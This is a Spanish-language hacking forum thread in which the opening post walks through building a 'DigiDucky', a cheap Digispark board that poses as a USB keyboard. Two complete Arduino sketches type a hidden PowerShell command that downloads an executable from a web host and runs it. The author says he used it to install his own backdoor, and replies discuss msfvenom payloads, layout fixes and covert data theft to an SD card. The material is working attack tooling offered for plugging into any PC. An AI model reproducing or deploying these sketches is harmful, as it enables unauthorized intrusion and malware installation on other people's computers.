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[In]Seguridad Informática => Hacking => Mensaje iniciado por: 79137913 en Febrero 01, 2017, 12:16:14 PM

Título: [Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Febrero 01, 2017, 12:16:14 PM
HOLA!!!

En este post explicare desde cero como hacer un DigiDucky (alternativa al RubberDucky mucho mas economica).

(http://i63.tinypic.com/2hd8p5e.jpg)

Pasos:

1 - Comprar la placa:
Para argentinos yo compre en este tipo y no tuve ningun inconveniente Mercadolibre (http://articulo.mercadolibre.com.ar/MLA-643647760-placa-de-desarrollo-arduino-usb-attiny85-digispark-mona-_JM)
Para el resto del Mundo pueden comprarlo de la web oficial de Digistump (http://digistump.com/products/1)

2 - Armado de ambiernte de desarrollo:

a - Instalar el IDE de arduino. Descargar (https://www.arduino.cc/en/Main/Software)
b - Instalar Drivers de Digispark y las dependencias del ide mas las librerias. Tutorial (https://digistump.com/wiki/digispark/tutorials/connecting) (esta en ingles, pero viendo las fotos se hace facil)

3 - El codigo:
Para este post voy a traducir el Payload wget & execute de RubberDucky (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute)
Payload original:
GUI r
DELAY 100
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
ENTER


Usaremos la libreria DigiKeyboard.h que lamentablemente esta hecha para teclados con distribucion US y no para teclados españoles (que supongo que es el que mas usamos nosotros), para crear scripts para teclados españoles deberan ir probando hasta encontrar el caracter que buscan, igual en mi ejemplo pueden ver que ya estan la mayoria cambiados a los que corresponden, con esos ya van a tener de sobra para hacer un monton de scripts, igual si necesitan info de como hacer alguna tecla especifica diganme en este post y les voy diciendo.

Codigo para el IDE de arduino [SI VAMOS A USAR EL DIGIDUCKY EN UNA PC CON DISTRIBUCION DE TECLADO ES(ESPAÑOL)]:
Código (cpp) [Seleccionar]

#include "DigiKeyboard.h"

#define KEY_MODIFIER_LEFT_GUI 0x08

int ciclos = 0;

void setup() {
  pinMode(1, OUTPUT);     // INICIAMOS EL PIN 1 (LED)
  digitalWrite(1, HIGH);  // ENCENDEMOS EL LED PARA SABER QUE SE INICIO EL DIGIDUCKY
}

void loop() {
  DigiKeyboard.update(); //iniciamos y mantenemos activo (keep alive) el driver de teclado

  if (ciclos == 0) { //si es el primer ciclo (esto es para que solo se ejecute una vez)
    DigiKeyboard.sendKeyStroke(0); //Enviamos una tecla vacia para iniciar la transferencia

    DigiKeyboard.delay(500); //Esperamos medio segundo para asegurarnos que la pc detecta nuestro Digispark como teclado
   
    //Codigo Payload: GUI r
    DigiKeyboard.sendKeyStroke(KEY_R,KEY_MODIFIER_LEFT_GUI); //Tecla inicio(windows) + R

    //Codigo Payload: DELAY 100
    DigiKeyboard.delay(250); // esperamos 250ms (para que se abra la ventana ejecutar) (aumente el delay a 250 por que asi es mas estable)

    //Codigo Payload: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
    DigiKeyboard.print("powershell /NoP /NonI /W Hidden /Exec Bypass @IEX *New/Object System.Net.WebClient(.DownloadFile*-http>&&example.com&bob.txt-,@$env>temp");
    DigiKeyboard.sendKeyStroke(53, MOD_ALT_RIGHT); // escribimos la barra invertida
    DigiKeyboard.print("bob.exe@(< Start/Process @$env>temp");
    DigiKeyboard.sendKeyStroke(53, MOD_ALT_RIGHT); // escribimos la barra invertida
    DigiKeyboard.print("bob.exe@@");

    DigiKeyboard.delay(100); // Esperamos 100ms

    //Codigo Payload: ENTER
    DigiKeyboard.sendKeyStroke(KEY_ENTER); // Presionamos enter en la ventana ejecutar
   
    DigiKeyboard.delay(100); //Esperamos 100ms
  }

//SEÑAL LUMINICA (PARPADEO)
//Aca generamos la señal luminica para que sepamos que ya se ha ejecutado el script y podemos retirar el DigiDucky
  delay(150);
  digitalWrite(1, HIGH);
  delay(150);
  digitalWrite(1, LOW);
//SEÑAL LUMINICA
     
  ciclos++; //Aumentamos el contador para luego no ejecutar nuevamente la secuencia de teclado
}


Codigo para el IDE de arduino [SI VAMOS A USAR EL DIGIDUCKY EN UNA PC CON DISTRIBUCION DE TECLADO US(AMERICANO)]:
Código (cpp) [Seleccionar]
#include "DigiKeyboard.h"

#define KEY_MODIFIER_LEFT_GUI 0x08

int ciclos = 0;

void setup() {
  pinMode(1, OUTPUT);     // INICIAMOS EL PIN 1 (LED)
  digitalWrite(1, HIGH);  // ENCENDEMOS EL LED PARA SABER QUE SE INICIO EL DIGIDUCKY
}

void loop() {
  DigiKeyboard.update(); //iniciamos y mantenemos activo (keep alive) el driver de teclado

  if (ciclos == 0) { //si es el primer ciclo (esto es para que solo se ejecute una vez)
    DigiKeyboard.sendKeyStroke(0); //Enviamos una tecla vacia para iniciar la transferencia

    DigiKeyboard.delay(500); //Esperamos medio segundo para asegurarnos que la pc detecta nuestro Digispark como teclado
   
    //Codigo Payload: GUI r
    DigiKeyboard.sendKeyStroke(KEY_R,KEY_MODIFIER_LEFT_GUI); //Tecla inicio(windows) + R

    //Codigo Payload: DELAY 100
    DigiKeyboard.delay(250); // esperamos 250ms (para que se abra la ventana ejecutar) (aumente el delay a 250 por que asi es mas estable)

    //Codigo Payload: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
    DigiKeyboard.print("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\"\"");

    DigiKeyboard.delay(100); // Esperamos 100ms

    //Codigo Payload: ENTER
    DigiKeyboard.sendKeyStroke(KEY_ENTER); // Presionamos enter en la ventana ejecutar
   
    DigiKeyboard.delay(100); //Esperamos 100ms
  }

//SEÑAL LUMINICA (PARPADEO)
//Aca generamos la señal luminica para que sepamos que ya se ha ejecutado el script y podemos retirar el DigiDucky
  delay(150);
  digitalWrite(1, HIGH);
  delay(150);
  digitalWrite(1, LOW);
//SEÑAL LUMINICA
     
  ciclos++; //Aumentamos el contador para luego no ejecutar nuevamente la secuencia de teclado
}


4 - Compilar y subir:
Colocamos subir en el IDE de arduino y ahi conectamos el Digispark para que se grabe el script.

5 - A divertirse:

Conecten el DigiDucky en cualquier pc y vean la magia!


Notas al pie:
El digispark no se lleva bien con los puertos USB de las pcs, por lo que es recomendable conectarlo a traves de un adaptador.
Yo use estos 2 y funcionaron bien:
Adaptador MachoHembra USB (http://www.dx.com/p/usb-2-0-male-to-female-extension-adapter-grey-413720):
(http://i66.tinypic.com/2db2zpu.jpg)
Adaptador USBHembra PS2 (http://www.dx.com/p/usb-female-to-ps2-male-convertor-plug-2702) (este no funciona para pasar el script, solo para ejecutarlo):
(http://img.alibaba.com/img/pb/488/854/377/377854488_166.jpg)


ACTUALIZACION: Distribuciones de teclado en español y en español latino (https://underc0de.org/foro/hacking/digispark-badusb-teclado-espanol-latam-y-espanol-espana-rubberducky-barato)

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Gabriela en Febrero 01, 2017, 12:26:29 PM

@79137913 (https://underc0de.org/foro/index.php?action=profile;u=21192)

Una interesante alternativa, explicada en forma  clara, detallada y comprensible.
Solo habrá que poner manos a la obra y probarlo!

Gracias por el aporte (y su prolijidad  ;D de exposición) y +1.

Saludos

Gabriela

Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: rush en Febrero 01, 2017, 01:57:11 PM
Que tal numeritos, que tan desapercibido pasa la ejecución de los comandos y las ventanas?(me imagino que se logra ver), ya que veo que se tiene que esperar a abrir la ventana de ejecutar, los comandos de la CMD, para ejecutar el payload, ahora otra cosa, que sucede si tu lo conectas a una pc que esta bloqueada, procede la ejecución?

Me gusto, y se me hizo barato a comparacion de RubberDucky.

Estoy casi a punto de comprarlo.

Saludos!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Febrero 01, 2017, 02:18:13 PM
HOLA!!!

@rush (https://underc0de.org/foro/index.php?action=profile;u=37736)

El script a partir de que abre la ventana de ejecutar hasta que se envia el comando (ahi se abre en segundo plano un powershell que no se ve) tarda 3 segundos.

Si la pc esta bloqueada no se ejecutara.

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: k3l0d3v en Febrero 01, 2017, 02:27:31 PM
 
@79137913 (https://underc0de.org/foro/index.php?action=profile;u=21192)

Buenasss!!
Capas mi duda sea tonta pero sinceramente no se para que funciona, o cual seria su función..
Alguien podría explicarme mas o menos cual seria su función?
Gracias!! Saludos!
Pd: esta muy bien explicado el post, por eso me genero la duda aver si pruebo y me lo hago :D
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Febrero 01, 2017, 02:33:16 PM
HOLA!!!

@Kelo_07 (https://underc0de.org/foro/index.php?action=profile;u=63325)

Este dispositivo emula a un RubberDucky (http://usbrubberducky.com/#!index.md) en palabras claras, le hace creer a la pc que es un teclado y envia una serie de pulsaciones de teclas.

En este caso las pulsaciones de teclas son maliciosas, descargan un exe y lo ejecutan en la carpeta temp (esto podria ser un troyano por ejemplo).

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: k3l0d3v en Febrero 01, 2017, 02:40:13 PM
Hola @79137913 (https://underc0de.org/foro/index.php?action=profile;u=21192)
Interesante.. Bastante interesante.. Creo que algo asi fue visto en la serie Mr Robot.. Creo, no estoy seguro..
voy a guardar el post en mis favoritos asi intento armarlo :D
Gracias por el post.. Esta muy bien explicado..
Saludos!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Suri77 en Febrero 01, 2017, 09:02:23 PM
Gracias por la info muy interesante lo voy a probar!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: HATI en Febrero 02, 2017, 02:44:04 PM
@79137913 (https://underc0de.org/foro/profile/79137913/) te pasaste. Si tengo la ocasión lo probaré.

A favoritos!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: JoxM en Mayo 04, 2017, 02:20:29 PM
Buenas!

Gracias por esta info, llevo un par de días trasteando con Digispark y la verdad que por 1 euro es una pasada.

Estoy tratando de hacer que un teclado europeo funcione sin problemas, soy un poco novato para esto.

Estaría bien ir recopilando información sobre digispark, ya que en español es muy escaso lo que hay.

He estado probando Duck2Park y parece que funciona bastante bien.

Ahora me he puesto a desarollar una aplicación para programar con digispark, quiero hacer algo similar a esto: https://ducktoolkit.com/payload/

Y también le integraré directamente Duck2Park.

Saludos!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Akra2k en Mayo 07, 2017, 11:59:39 PM
Interesante... yo estuve buscando mucho pendrives con Phison, pero en este pais es imposible,
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Mayo 16, 2017, 06:54:34 PM
Con esto puedo conectar al digiducky a la pc e instalar un .exe con payload?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Mayo 16, 2017, 08:36:28 PM
Puedo agregarle una tarjeta sd a este DigiDucky?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: H4R4K1R1 en Mayo 17, 2017, 03:54:46 AM
Muy interesante, habrá que darle un vistazo en profundidad, muchas gracias por el aporte.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Mayo 28, 2017, 09:28:59 PM
buen aporte, lo del teclado en español es bueno tenerlo en cuenta yo tengo mis librerias en español dado que utilizo arduino leonardo como dispositivo hid y ejecuto un downloader, pero esta tarjeta en mi pais no vale ni la mitad de arduino leonardo, creo que me la comprare gracias.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Junio 06, 2017, 11:25:06 PM
esta bueno el post, inclusive me inspiro a conseguirme la tarjeta, lamentablemente tengo problemas con el layout en US, en arduino como lo tenia simplemente cambie la libreria, pero aqui tengo problemas con el caracter que reemplaza "/" que es "&" el enlace que necesito ejecutar contiene en la url un & y eso me jode, tendre que redireccionar para cambiar el enlace, lo malo que los acortadores estan mas intelegentes ultimamente y si utilizo el de google, saldra la tipica advertencia.

algunos tips para mejorar eso?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Junio 07, 2017, 08:25:22 AM
HOLA!!!

Si tenes que hacer el caracter & tenes que teclear el caracter que se ubica en Shift 6 en el teclado Estadounidense osea ^.

Prueba y nos contas!

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Junio 07, 2017, 08:52:15 AM
Yo monte una caja para conectar joysticks viejos (de la nes, snes, megadrive,MSX,etc..) al pc y mapearlos como teclado. Lo monté con un arduino leonardo (hay versión normal y versión pequeñita) porque tiene la capacidad de conectarse como teclado. Dejo la info de la API que es parecida a la que usáis (o la misma que usa el programa que ponéis) aquí:

https://www.arduino.cc/en/Reference/MouseKeyboard (https://www.arduino.cc/en/Reference/MouseKeyboard)

Realmente me parece que realmente el chip interno que tiene el cacharrico que ponéis es el mismo que lleva el leonardo.
Realmente igual lo suyo seria ponerle un lector de SD y ejecutar un script que se comunique via usbttl con la placa para guardar información útil en la SD. Después retirar la placa y a correr.

https://www.arduino.cc/en/Reference/SD (https://www.arduino.cc/en/Reference/SD)

Realmente igual hay espacio para a traves de printf, montarse un script en powershell que se ejecute al inicio o cosas asi, para no tener que contactar via internet y que no se vea en los programas de monitorización. Y que tome datos relevantes del ordenador para almacenarlos en la sd. Lo unico que hay que cambiar del modo usb tarjeta a modo usb tty desde el programa.

Si lleva una SD se puede hacer que el programa se cargue de la SD al ordenador de modo que despues se ejecute y se ponga a almacenar datos del ordenador en la SD.

Saludos.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Junio 07, 2017, 03:28:07 PM
Como se sueldan los pines del digispark?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Junio 08, 2017, 10:41:48 AM
HOLA!!!

Para este proyecto no es necesario soldar ningun pin.

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Junio 08, 2017, 11:03:12 AM
Pero vamos que soldar es pasar el cable y usar el estañador. Son agujeros suficientemente grandes como para no cagarla, creo yo.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Junio 08, 2017, 11:07:49 PM
Bueno despues de todo, logre modificar de forma sencilla mi link, el problema radica que : lo escribe como ñ y otros caracteres que tambien los imprime mal como el \ que lo hace ¬, alguien amable que se de el tiempo de modificar el layout, estuve buscando informacion por lo que escribio otro usuario unos post mas atras "Duck2Park", la verdad que no encontre nada de eso que usas,  si puedes ofrecer mas info se agradece, yo encontre esto pero es conversor Robberducky a Digispark (https://samvella.co.uk/Digiducky/), tambien la forma de subir un archivo para descarga directa, usen "Google Drive", luego (http://www.technorange.com/cloudlinker-direct-link-generator-for-dropboxgoogle-driveone-drive-copy-com/), luego de eso lo acortan con (https://bitly.com/), espero que les sea de ayuda, y si alguien puede coperar con el layout en es, estare agradecido si es que no lo hago yo un dia con tiempo, ya que con el trabajo solo dedico un par de horas a educarme informaticamente.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Junio 12, 2017, 03:33:44 PM
El archivo txt que vos denominaste bob, que tiene que contener?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: rush en Junio 12, 2017, 03:42:48 PM
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El archivo txt que vos denominaste bob, que tiene que contener?

Es el payload que ejecutara, con dicho comando desde powershell
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Junio 12, 2017, 03:48:54 PM
Algun programa para crearlo? o lo haces con el msfvenom?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Junio 12, 2017, 03:53:06 PM
Otra consulta, yo copie el codigo este que puso numeritos y lo compile en mi digispark, el problema que tengo ahora es que no me lo detecta la computadora, se que me equivoque en parte del codigo, como hago para borrar lo que tiene si no me lo detecta la pc?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: rush en Junio 12, 2017, 06:23:37 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Otra consulta, yo copie el codigo este que puso numeritos y lo compile en mi digispark, el problema que tengo ahora es que no me lo detecta la computadora, se que me equivoque en parte del codigo, como hago para borrar lo que tiene si no me lo detecta la pc?

Intentaste conectarlo con el adaptador como lo dice numeritos?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Nhevheq en Junio 13, 2017, 02:47:37 PM
Puede explicar un poco mas sobre como crear el bob.txt y el listener?
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Skali en Junio 18, 2017, 01:43:50 AM
Muy buenas! Te agradezco mucho por éste aporte! Te comento mi situación. Le compre una placa al mismo vendedor que vos, y compré un adaptador macho hembra en una casa de electrónica de mi ciudad... Tuve que hacerle un par de modificaciones al código para que funcionara sobre mis sistemas operativos, tanto en el delay, como en el número de la barra invertida por ejemplo. Pero tuve otros problemas, por ejemplo, al principio siempre usaba el digispark con adaptador, podía grabar excelentemente el programa compilado, pero mi pc que use de víctima con Windows, a veces lo detectaba, a veces no, o a veces tardaba demasiado. Tuve que recompilarlo y subirlo muuuuchas veces para ir probando, y era bastante random. A veces funcionaba a veces no, es decir, a veces se llegaba a abrir la ventana y teclear el comando y a veces no.. Luego probé enchufando el digispark directamente, y tuve resultados mágicos. Siempre me funcionaba, y era detectado mas rápidamente. Pero el problema que tengo ahora es que no puedo volver a cargarle otro programa. En el momento que me dice: "Plug in device now" lo introduzco, y se pone a escribir el comando, pero nunca me borra el código viejo ni me sube el código nuevo. Tendrás idea como solucionar éste problema? Probé muchas cosas y todavía no puedo volver a grabar un código nuevo. Gracias desde ya
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Junio 21, 2017, 02:55:34 PM
HOLA!!!

@Skali (https://underc0de.org/foro/index.php?action=profile;u=52588) : El problema sucede por que Windows le roba el driver al compilador de arduino. (es decir antes de que se suba el codigo windows lo detecta como teclado y se lo quita al arduino ide)

2 soluciones:

La facil, intentar subir un script de blink digispark o un script bien pequeño que no tarde en ser cargado al digispark e intentar reiteradas veces (he probado hasta 50) para que lo suba antes de que windows robe el dispositivo.

La dificil, deshabilitar el plug & play para dispositivos HID (HUMAN INTERFACE DEVICES) de windows y de esta manera windows nunca vera al digispark como teclado y por ende no le quitara el handle al ide de arduino.

@Nhevheq (https://underc0de.org/foro/index.php?action=profile;u=65153) : en este caso bob.txt es un servidor de un backdoor que subia yo. (era un exe)

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Junio 21, 2017, 03:38:05 PM
Nada mas reiniciar la placa esta en un estado de inicio en el que no es aun teclado. En ese tiempo suele poder hacerse el flasheo, yo suelo pulsar en la placa arduino el boton de reset antes de cargar para asegurarme de que aun no está en modo teclado.

Por otro lado, siempre es bueno meter un sleep al principio del programa antes de iniciar el keyboard de manera que puedes utilizar dicho tiempo para el tema del cargado de datos.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Junio 26, 2017, 05:18:05 PM
sin el \ no funciona nada y no es el codigo 53 en teclado es, he intentado cambiar el payload pero los demas tienen caracteres mas extraños aun, si alguien logra dar como insertar el \ estare agradecido, he probado con utf8 y no logro hacerlo funcionar, he probado bastante y mucho.
pongo para probrar :

#define test 0x0xx
abajo agrego test+mayus o alt right y varias formas y varios codigos y no logro dar con el.
he probado duck2script, duckencoder y lo peor que me inserta la mitad del payload y termina de ejecutar y cuando extraigo el dispositivo me deja la tecla shift presionada seleccionando todo lo que clickee y tengo que reiniciar el pc.

si alguien sabe que me enseñe estare agradecido, he probado bastante pero soy soldador con ganas de aprender y enseñar no un programador o estudiante de esto.

fuentes: http://www.utf8-chartable.de/unicode-utf8-table.pl?utf8=char
https://mothereff.in/utf-8
https://github.com/mame82/duck2spark
https://nixu-corp.github.io/ los archivos que te descargas hay que buscar los demas y agregarlos a la carpeta descomprimida, los archivos .h los encuentras buscando en C:


edito: creo que la distribucion en español solo esta disponible para español españa porque lo probe con uno y si funciona el digiducky, pero en mi pc que he programado todo este tiempo y hacia pruebas es español chile, y no me funciono con cientos de pruebas y semanas rompiendome la cabeza intentando encontrar el bit utf8 y hacerlo funcionar, hay que encontrar algun metodo de hacerlo sin que afecte la distribucion de teclado.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Junio 27, 2017, 11:02:59 AM
HOLA!!!

Vamos, sean creativos, para trabajar sin \ podes usar el comando cd (change directory) de powershell o BATCH, con esto navegas a la ubicacion que necesites y luego ejecutas sin path

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Junio 28, 2017, 10:32:12 PM
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HOLA!!!

Vamos, sean creativos, para trabajar sin \ podes usar el comando cd (change directory) de powershell o BATCH, con esto navegas a la ubicacion que necesites y luego ejecutas sin path

GRACIAS POR LEER!!!


perdon pero te equivocas, al agregar la linea cd tienes que darle el nombre a continuacion empezando con un \, pero la solucion es el ultimo link que puse en mi comentario anterior, solo agregas un payload de un rubberducky, y te descargas directo el sketch con el idioma a eleccion, llegar y subir al arduino, saludos.

Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Junio 29, 2017, 04:29:06 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
perdon pero te equivocas, al agregar la linea cd tienes que darle el nombre a continuacion empezando con un \, pero la solucion es el ultimo link que puse en mi comentario anterior, solo agregas un payload de un rubberducky, y te descargas directo el sketch con el idioma a eleccion, llegar y subir al arduino, saludos.
Bueno eso no es del todo cierto, con cd puedes poner el nombre del directorio y entras en el. No hace falta poner la contrabarra. Si tienes que ir al directorio anterior pones dos puntos. y Asi vas de directorio en directorio paso a paso.

https://www.computerhope.com/cdhlp.htm (https://www.computerhope.com/cdhlp.htm)

En el de linux tampoco.

Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Junio 29, 2017, 04:00:00 PM
HOLA!!!

Antes que nada @animanegra (https://underc0de.org/foro/index.php?action=profile;u=64559), gracias por la defensa, aunque no era necesaria.

@matzcontreras (https://underc0de.org/foro/index.php?action=profile;u=23513) Deberias leer un poco mas al respecto, intenta no ser un script kiddie y tener imaginacion, es lo mas importante de todo con imaginacion y creatividad se puede hacer todo.

La respuesta te la dio animanegra, yo no tengo nada mas que agregar.

Que sigan las dudas, no sean timidos!!

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: matzcontreras en Junio 30, 2017, 08:58:09 PM
justamente tienen toda la razon, lamento no haberme educado antes al respecto, dado que hace años hacia comandos en batch y los compilaba a exe y estaba afuera de las canchas inclusive antrax me conoce con mi nick antiguo pero no lo uso, y despues de 5 años sin meterme en una computadora es todo nuevo para mi, gracias por sus respuestas espero apoyar con mis proximos comentarios.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Julio 01, 2017, 06:29:09 AM
Siento la confusión. No estaba defendiendo a nadie, me limité a corregir un comentario que a mi parecer era parcialmente erróneo. Sin ningún tipo de acritud ni nada. :)
Saludos.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: EddiFog en Julio 27, 2017, 12:46:16 AM
Hola chicos! :D Pues a mi tambien me a surgido la duda. Es cierto que puedes usar "cd" en vez de "\" pero si se trata del tipico caso de ctrl+s y despues para escribir la ruta necesitas el "\" que caracter sería?  ??? Por mi parte aún no encuentro nada pero si encuentro lo posteare despues  :D
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: animanegra en Julio 27, 2017, 07:22:14 AM
El tema es que si abres una consola de cmd puedes hacer cd .. hasta llegar a la raiz y despues hacer cd directorio para ir subiendo de directorio de uno en uno.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Julio 27, 2017, 10:18:25 AM
HOLA!!!

Si lo que utilizas para guardar es el Common Dialog podes usar Barras normales para delimitar directorios.

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: EddiFog en Julio 27, 2017, 05:46:16 PM
Exacto! Uso el Common Dialog pero no encuentro alguna pagina que me de un ejemplo de como hacerlo mediante barras, agradeceria mucho si me pudieras decir o brindarme alguna fuente. Gracias :D
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: MRX en Agosto 12, 2017, 12:35:47 AM
Tengo un pequeño inconveniente, necesito escribir la tecla especial ">" y no puedo por la diferencia de teclados, he buscado por Internet y hasta encontré sus librerías pero nada me funciona, me pondrían decir cual es la tecla que contrasta con ">" se los pido por favor.

Un saludo.
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: JoxM en Agosto 12, 2017, 07:45:40 AM
Hola amigos!

Echar un vistazo a esto:

https://underc0de.org/foro/hacking/digiscript-suite-beta-editor-de-scripts-para-digispark/ (https://underc0de.org/foro/hacking/digiscript-suite-beta-editor-de-scripts-para-digispark/)

Saludos!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Xonr en Octubre 26, 2017, 09:39:36 PM
que hago si la pc me dice que no reconoce el dispositivo conectado? intento actualizar los drivers pero sigue sin funcionar
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: 79137913 en Octubre 27, 2017, 08:41:52 AM
HOLA!!!

Utiliza un adaptador usb o simplemente reconecta hasta que detecte.

GRACIAS POR LEER!!!
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: Xonr en Octubre 27, 2017, 04:47:07 PM
Perdon soy nuevo en esto y necesito ayuda!!!!!

despues de horas intentando porq no me funcionaba logre que funcionara en un puerto 3.0. logre cargarle el script y empezo a titilar la lucesita. ahora la pregunta del millon

supongamos que le cargo un script the FORK bomb o cualquier otro y lo subo al digispark, lo uso en otra computadora funciona y todo bien. Cuando lo vuelva a conectar en mi computadora para editar/cambiar/borrar ese script no se ejecutaria tambien en mi computadora????

porfavor explicarme con detalles a alguien noob como yo. si pueden enviarme mails, [email protected]
Título: Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Publicado por: httpmix en Enero 28, 2021, 03:49:09 PM
@79137913 (https://underc0de.org/foro/index.php?action=profile;u=21192) Muchas gracias! aunque ya esto tiene tiempo de publicado, agradecer nunca esta de más, y con mayor razón cuando fue realmente útil... (esas benditas distribuciones de teclados que desacomodan todo  ::) )